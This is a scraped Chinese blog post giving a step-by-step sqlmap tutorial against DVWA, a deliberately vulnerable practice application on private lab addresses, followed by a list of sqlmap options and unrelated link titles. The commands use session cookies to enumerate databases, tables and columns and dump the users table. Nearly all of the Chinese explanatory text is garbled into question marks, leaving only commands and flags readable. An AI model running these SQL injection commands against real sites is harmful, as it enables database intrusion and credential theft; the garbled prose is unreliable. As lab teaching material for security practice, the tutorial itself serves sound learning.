sqlmap

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqlmap相关的知识,希望对你有一定的参考价值。

?????????--   ??????   dump   inf   dvwa   ??????   ??????   submit   column   

???dvwa??????
 
  1.????????????
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
  ??????sqlmap got a 302 redirect to xxx ????????????????????????????????????????????????cookie?????????

??????????????????
 
  2.??????cookie
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;phpSESSID=7hgqg3g3dubae6fooohnln6ec3"
  ??????????????????
??????????????????
 
  3.???????????????
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --dbs

??????????????????
   
   4.???????????????????????????
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch -D dvwa --tables
   
   5.????????????????????????
    sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --tables

 

   6.???????????????????????????

???sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --columns

 

   7.?????????????????????

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --dump
   ??????????????????

    8.???????????????????????????????????????

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch --current-db --dump


   -batch ?????????????????????
  -a  ?????????????????????
  --current-db  ????????????????????????????????????--??????
  --dbs ?????????????????????????????????--??????
  --tables  ??????????????????????????????????????????--??????
  --columns ????????????????????????????????????????????????--??????
  -D  ???????????????
  -T  ????????????
  -C  ????????????
  --dump  ??????????????????
  --dump-all  ???????????????????????????
  --stop=x  x?????????????????????????????????????????????
  ???????????????????????????????????????????????????-???????????????????????????--???????????????????????????





































以上是关于sqlmap的主要内容,如果未能解决你的问题,请参考以下文章

6-24学习记录

sqlmap命令

sqlmap: 初体验

这个看起来有点简单!

SQL注入:初步体验Sqlmap

SQL注入:Sqlmap初体验